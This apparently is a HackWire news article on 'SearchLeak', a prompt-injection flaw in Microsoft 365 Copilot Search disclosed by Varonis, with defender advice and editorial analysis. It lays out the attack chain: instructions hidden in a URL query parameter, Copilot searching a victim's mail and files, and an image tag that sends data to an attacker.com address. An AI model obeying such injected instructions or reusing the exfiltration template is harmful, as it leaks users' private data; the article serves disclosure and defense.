# Microsoft Copilot 'SearchLeak' Vulnerability Exposed Data to One-Click Attack
A novel three-stage prompt-injection flaw allowed attackers to silently steal emails, meeting notes, and OneDrive files from enterprise users through a single malicious link
A critical vulnerability in Microsoft 365 Copilot called "SearchLeak" would have allowed threat actors to silently exfiltrate sensitive business documents, emails, and collaboration files from enterprise users with nothing more than a single click. Researchers at Varonis Threat Labs disclosed the three-stage attack on June 15, 2026—the same day Microsoft patched the flaw—revealing a dangerous new class of AI-specific vulnerabilities that security teams are only beginning to understand.
The attack represents a significant escalation in prompt-injection techniques, specifically exploiting a lesser-known attack vector called parameter-to-prompt injection (P2P) that leverages hidden URL parameters and image tags to bypass AI safety guardrails. What makes SearchLeak particularly dangerous is its simplicity: attackers needed only to send victims a specially crafted link via email, Slack, Teams, or any other communication channel to compromise their data.
## The Threat: How SearchLeak Works
The SearchLeak vulnerability operates through a three-stage attack chain that weaponizes the way Copilot processes user prompts:
Stage 1: Delivery via Malicious Link
The attacker crafts a URL to Microsoft 365 Copilot Search structured like this:
https://m365.cloud.microsoft/search/?auth=2&origindomain=microsoft365&q=<PROMPT>The q parameter contains the attacker's malicious instructions. The link is distributed through email, Slack, or other channels where the victim might click it.
Stage 2: Copilot Executes Hidden Instructions
When the victim clicks the link, their browser loads Copilot Search with the embedded prompt already active. The victim may see what appears to be a normal Copilot interface, but in the background, the AI is executing the attacker's hidden instructions—searching for sensitive information like emails containing multifactor authentication codes, meeting notes with financial data, or OneDrive files containing confidential documents.
Stage 3: Data Exfiltration
The attacker's prompt instructs Copilot to extract the requested data and place it into a URL pointing to an attacker-controlled server. Because of how the attack is structured, the data is sent before Microsoft's sanitization systems can block it.
### The Bypass: Image Tags and Race Conditions
What made SearchLeak particularly difficult for Microsoft to defend against was Varonis' discovery of a clever bypass technique. Even when Microsoft's guardrails attempted to block certain versions of the attack, researchers found that attackers could embed the exfiltration link inside an HTML image tag pointing to a Bing search-by-image endpoint:
<img src="https://www.bing.com/images/searchbyimage?cbir=sbi&imgurl=https://attacker.com/$TITLE/img.png">This bypass works for two critical reasons:
## Technical Details: Parameter-to-Prompt Injection (P2P)
SearchLeak represents a distinct evolution in prompt-injection attacks. While traditional prompt injection attacks modify the text content of a prompt that users enter, parameter-to-prompt injection (P2P) attacks hide malicious instructions in URL parameters, configuration variables, or other indirect inputs that users may not expect to contain executable code.
How P2P Differs from Traditional Injection:
| Attack Type | Vector | Visibility | Difficulty |
|---|---|---|---|
| Direct Prompt Injection | User input field | Obvious to defender | Lower |
| Indirect Prompt Injection | External data, files, URLs | Hidden from user | Medium |
| Parameter-to-Prompt Injection | URL parameters, variables | Hidden in data structures | Higher |
The SearchLeak attack exploited P2P specifically because the malicious prompt was embedded in the URL's query parameter—a location users typically don't scrutinize, and where they wouldn't expect instructions to be executed by an AI system.
## What Data Was at Risk
If an enterprise user had clicked a SearchLeak link before the patch, attackers could have accessed:
The scope of potential compromise was limited only by what the individual victim had access to—but in most enterprise environments, this includes sensitive financial data, customer information, intellectual property, and strategic plans.
## Background and Context: The Rise of AI-Specific Vulnerabilities
The SearchLeak disclosure comes as enterprises rush to deploy AI-powered tools across their workflows. Microsoft 365 Copilot has become a critical productivity tool in thousands of organizations, integrated directly into Outlook, Teams, Word, Excel, and other applications that users interact with daily.
However, this rapid adoption has outpaced security research and defensive capabilities. Prompt-injection attacks were theorized as early as 2022, but their real-world severity has only become apparent as AI systems gained access to sensitive data and elevated permissions.
Why This Matters Now:
Copilot's integration with Microsoft 365 services gives it access to some of the most sensitive data organizations possess. Unlike traditional web applications where access controls are managed through authentication and authorization systems, AI-powered systems can be tricked into bypassing these controls through clever prompting. The SearchLeak vulnerability proves that even enterprise-grade AI systems can be compromised through social engineering vectors (convincing users to click links) combined with technical exploits.
## Defender Recommendations
Organizations using Microsoft 365 Copilot should take the following steps immediately:
Patch Management:
User Education:
Detection Strategy:
Policy Controls:
## HackWire Analysis
SearchLeak represents a watershed moment in AI security: the first widely disclosed zero-day-style vulnerability that weaponizes the fundamental way modern AI systems process instructions. What's particularly unsettling isn't the exploit itself—it's what it reveals about the massive gap between AI deployment velocity and AI security maturity.
For years, security researchers warned that prompt injection would be the "new SQL injection" of the AI era. SearchLeak proves they were right. The vulnerability exploited basic design assumptions: that users would review what they click, that data wouldn't leak through image tags, that guardrails operating at the prompt level would catch malicious instructions. All three assumptions failed simultaneously.
But the deeper pattern here is about trust boundaries and permissions creep. Microsoft 365 Copilot doesn't just process prompts—it executes them with the full permissions of the authenticated user. When you can trick Copilot into exfiltrating your own email, the system has fundamentally confused "user request" with "AI-interpreted request." In mature security architectures, these are enforced as separate trust boundaries. In modern AI systems, they collapse into one.
The second critical pattern: this vulnerability required no zero-day exploit, no leaked credentials, no malware installation. It required only that users be tricked into clicking a link—the social engineering equivalent of a padlock left hanging open. This is the attack surface of the 2020s: not exploits, but manipulation of AI-powered systems that were designed to be "helpful" by default and "suspicious" only in narrow, easily-bypassable ways.
Organizations deploying AI tools should learn from SearchLeak that "shipping first and securing later" has become genuinely dangerous when the system has data access. Every AI deployment needs threat modeling *before* broad rollout, not after the first vulnerability is published.
— HackWire Editorial
## Recommendations for CISOs and Security Leaders
1. Inventory your AI deployments: Document all AI tools with access to sensitive data (Copilot, ChatGPT Enterprise, custom LLMs, etc.)
2. Implement prompt-level monitoring: Deploy logging and alerting that captures what prompts are being executed by AI systems, not just what users are asking
3. Review AI vendor security posture: Evaluate whether your AI providers conduct threat modeling before launch and maintain bug bounty programs for AI-specific vulnerabilities
4. Plan for post-exploitation: Assume your users will eventually fall for a phishing link that tricks AI systems. What forensic data do you need to detect and scope breaches after the fact?
5. Advocate for AI security standards: The industry lacks consensus on securing AI systems. Support and participate in emerging standards like OWASP's AI Exchange and NIST's AI Risk Management Framework
## Related Coverage